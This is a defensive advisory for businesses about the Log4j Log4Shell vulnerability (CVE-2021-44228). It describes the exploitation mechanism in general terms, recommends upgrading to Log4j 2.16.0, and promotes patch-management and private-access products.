As many of you will be aware, a recent and severe vulnerability (CVE-2021-44228) of the Apache Log4j Java logging library between versions 2.0 and 2.14.1 has been discovered. This vulnerability allows for unauthenticated remote code execution into a highly popular system that is used by a large number of major applications and web services. Originally reported by the Alibaba Cloud Security Team, the vulnerability has been given the maximum CVSS score of 10 due to the wide use of Log4j and the ease of the exploitation.
What effect does this have on my business?
The Log4j library can be found in countless servers all over the world, which means that cyber criminals can leverage this vulnerability to inject arbitrary code into those servers and eventually allow complete system takeover. This leaves a clear and significant security threat to businesses all over.
The vulnerability, also known as Log4Shell, can be taken advantage of with ease. The attackers force a vulnerable application to write a single malicious string back to the log and the Java Naming and Directory Interface (JNDI) is used to conduct a message lookup substitution (if enabled) to fetch a remote resource and execute any malicious payload that has been retrieved.
Steps to remediation
Users are highly encouraged to update their Log4j library to the latest release from Apache (currently Log4j 2.16.0) which has completely removed the JNDI Lookup functionality by default.
Refer to the Apache Logging Services website for regular updates.
Vulnerability Assessments and Patch Management
The more servers and users you have within your business, the longer it takes to check for and patch vulnerabilities, as each issue requires time spent individually patching the specific vulnerability.
Acronis Cyber Protect Cloud enables simple, fast, and reliable vulnerability assessment and patch management functionalities. By automatically retrieving and installing critical updates as soon as they become available, the solution ensures minimal exposure time to zero-day exploits — keeping your systems and data safe from cutting-edge cyberthreats while reducing the demand on IT resources.
If you are running internal applications that cannot be immediately patched, you can mitigate the risk of exploitation by limiting access to the app. A private access solution, such as Netskope Private Access, can be used to make private apps invisible to external attackers who seek to exploit vulnerable services. Furthermore, a private access solution can restrict access to a private app internally, such that only authorised users are able to access the app, reducing the risk that a compromised user or device could be used to exploit vulnerable services.